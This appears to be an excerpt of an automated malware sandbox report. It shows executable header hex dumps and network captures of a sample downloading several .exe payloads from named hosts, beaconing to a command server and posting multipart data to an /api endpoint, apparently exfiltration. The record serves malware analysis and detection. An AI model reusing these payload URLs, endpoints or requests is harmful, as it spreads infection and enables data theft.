00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 8a 02 00 04 00 00 1a 36 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 0d 0b 00 28 00 00 00 00 50 89 02 78 da 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 06 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5d a3 00 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7c 56 0a 00 00 c0 00 00 00 58 0a 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 23 7e 02 00 20 0b 00 00 28 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 da 00 00 00 50 89 02 00 dc 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 16 Apr 2024 23:37:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 15 Apr 2024 09:11:19 GMTAccept-Ranges: bytesContent-Length: 5719040Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 16 9a 19 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ac 03 00 00 00 01 00 00 00 00 00 c6 b9 54 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 8e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 c1 46 00 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 8e 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 3b 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 aa 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fb 28 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 ad 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 30 00 00 00 ff ed 32 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 31 00 00 00 50 39 57 00 00 90 37 00 00 3a 57 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 72 65 6c 6f 63 00 00 e0 05 00 00 00 d0 8e 00 00 06 00 00 00 3e 57 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /setup.exe HTTP/1.1Host: rachmatmusa.comConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 190.195.60.212 190.195.60.212
Source: Joe Sandbox View IP Address: 172.67.139.220 172.67.139.220
Source: Joe Sandbox View ASN Name: IQHOSTRU IQHOSTRU
Source: Joe Sandbox View ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /ef.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: rachmatmusa.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: greetclassifytalk.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: greetclassifytalk.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18163Host: greetclassifytalk.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8784Host: greetclassifytalk.shop
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20437Host: greetclassifytalk.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1395Host: greetclassifytalk.shop
Source: global traffic HTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 575475Host: greetclassifytalk.shop
Source: global traffic HTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgxadidbdelxo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sssysoxpowskq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xciicifkahsusm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhwvhnawpodfw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eftwvrvhrug.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sixirditydviybk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ganprdomcgjp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bqgaavdatgmguasj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwooigpfawab.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wilbrfndnaxd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkpugbfavemjr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xaujiohuovscfq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urthlaprmdtw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mumqymwkijyoaeqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwkgcmsvcvsujcyw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcqhhfpfgvixjiy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pivaahbgmuglhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkdkkvdwsehisur.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /klounada.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: roundcube.custommarinesvcs.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idbcjrnktbqiar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcnaqoxecks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayqrrixfddy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euchxwlxunfwa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sytoxvgxalxhtwjn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxaubninrcq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evedxojhgmir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gikvtulnprqiuhs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqopyuqqwkaqemh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdvofxxltcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyxntrnfkoba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fyrobwrmxkmuxgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltylkwimoqvt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spuyspbbfdgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tidmqkxtyljdtj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleidyccfrrlkw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: trad-einmyus.com
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.65.50
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 10_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /ef.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: rachmatmusa.com
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic HTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
Source: global traffic HTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /setup.exe HTTP/1.1Host: rachmatmusa.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
Source: global traffic HTTP traffic detected: GET /klounada.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: roundcube.custommarinesvcs.com
Source: A5B6.exe, 00000011.00000003.2184183993.0000000003570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: A5B6.exe, 00000011.00000003.2184792998.0000000003570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: A5B6.exe, 00000011.00000003.2184951470.0000000003570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: trad-einmyus.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: greetclassifytalk.shop
